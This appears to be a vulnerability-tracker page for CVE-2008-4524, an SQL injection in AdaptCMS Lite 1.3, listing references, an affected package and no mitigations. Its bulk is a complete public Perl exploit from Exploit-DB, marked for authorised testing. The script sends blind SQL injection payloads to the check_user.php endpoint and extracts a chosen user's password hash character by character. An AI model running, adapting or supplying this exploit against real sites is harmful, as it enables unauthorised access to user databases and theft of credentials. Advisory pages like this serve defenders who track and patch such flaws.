CVE-2008-4524
unknown
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
1.0
Description
AdaptCMS SQL Injection vulnerability
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
AdaptCMS Lite 1.3 - Blind SQL Injection
#!/usr/bin/perl
# -----------------------------------------------------
# AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit
# Discovered By StAkeR - StAkeR[at]hotmail[dot]it
# Discovered On 03/10/2008
# -----------------------------------------------------
# Download http://www.insanevisions.com/page/downloads
# -----------------------------------------------------
use strict;
use LWP::UserAgent;
my ($hash,$send,$sub) = (undef,undef,1);
my ($host,$uid) = @ARGV;
usage() unless $host =~ /^http:\/\/(.+?)$/i and $uid =~ /^[0-9]$/;
sub send_request
{
my $param = shift @_;
my $http = new LWP::UserAgent;
my $post = $http->post($host.'/includes/check_user.php',[ user_name => $param ]);
if($post->is_success)
{
return 38 unless $post->content =~ /yes/i;
}
}
my @chars = (48..57, 97..102);
for(0..32)
{
foreach my $set(@chars)
{
$send = "' or ascii(substring((select password".
" from adaptcms_users where id=$uid),$sub,1))=$set#";
if(send_request($send) > 1)
{
$hash .= chr($set);
$sub++;
last;
}
}
}
sub usage
{
print "[?] AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit\n";
print "[?] Usage: perl $0 http://[host] [user id]\n";
exit;
}
if(defined $hash)
{
print "[?] Hash: $hash\n";
exit;
}
else
{
print "[?] Exploit Failed!\n";
exit;
}
# milw0rm.com [2008-10-03]
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| Packagist | adaptcms/adaptcms | <=1.3 | |
References
- https://nvd.nist.gov/vuln/detail/CVE-2008-4524
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45642
- https://github.com/adaptcms/AdaptCMS
- https://web.archive.org/web/20200228141415/http://www.securityfocus.com/bid/31557
- https://www.exploit-db.com/exploits/6662
- http://www.adaptcms.com/article/51/News/URGENT-AdaptCMS-13-Security-Fix-Released
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.